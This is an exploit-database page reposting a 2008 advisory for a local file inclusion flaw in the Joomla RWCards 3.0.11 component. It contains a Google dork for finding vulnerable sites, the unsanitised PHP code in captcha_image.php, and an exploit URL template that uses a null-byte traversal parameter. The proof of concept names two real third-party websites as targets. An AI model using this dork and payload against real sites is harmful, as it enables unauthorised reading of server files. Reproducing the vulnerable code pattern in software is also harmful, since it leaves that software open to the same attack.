Lucene search
+L

Joomla! Component RWCards 3.0.11 - Local File Inclusion

🗓️ 23 Oct 2008 00:00:00Reported by Vrs-hCkType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Joomla! RWCards 3.0.11 LFI Vulnerability in com_rwcard

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6172
23 Oct 200800:00
circl
cve
CVE
CVE-2008-6172
19 Feb 200916:00
cve
cvelist
Cvelist
CVE-2008-6172
19 Feb 200916:00
cvelist
euvd
EUVD
EUVD-2008-6142
7 Oct 202500:30
euvd
nuclei
Nuclei
Joomla! Component RWCards 3.0.11 - Local File Inclusion
7 Aug 202602:59
nuclei
nvd
NVD
CVE-2008-6172
19 Feb 200916:30
nvd
prion
Prion
Directory traversal
19 Feb 200916:30
prion
[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software : RWCards 3.0.11 Component for Joomla 1.5 CMS                              |
 |  Vendor   : http://www.weberr.de/                                                    |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    inurl:com_rwcards

[»] Vulnerable

    ./components/com_rwcards/captcha/captcha_image.php

    15: if (!empty( $_GET['img'] ) )
    16:    $img = $_GET['img'];
    17: else
    18: {
    19:    echo 'no image file specified via &img=...';
    20:    exit;
    21: }
    22:
    23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb'))
    24:    {
    25:        echo 'could not open image file!';
    26:    }
    27: else
    28: {
    29:     fpassthru( $fh );
    30:     fclose( $fh );
    31: }

[»] Exploit

    http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00

[»] Proof of Concept

    http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
    http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
 |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
 |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2008-10-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.12284
48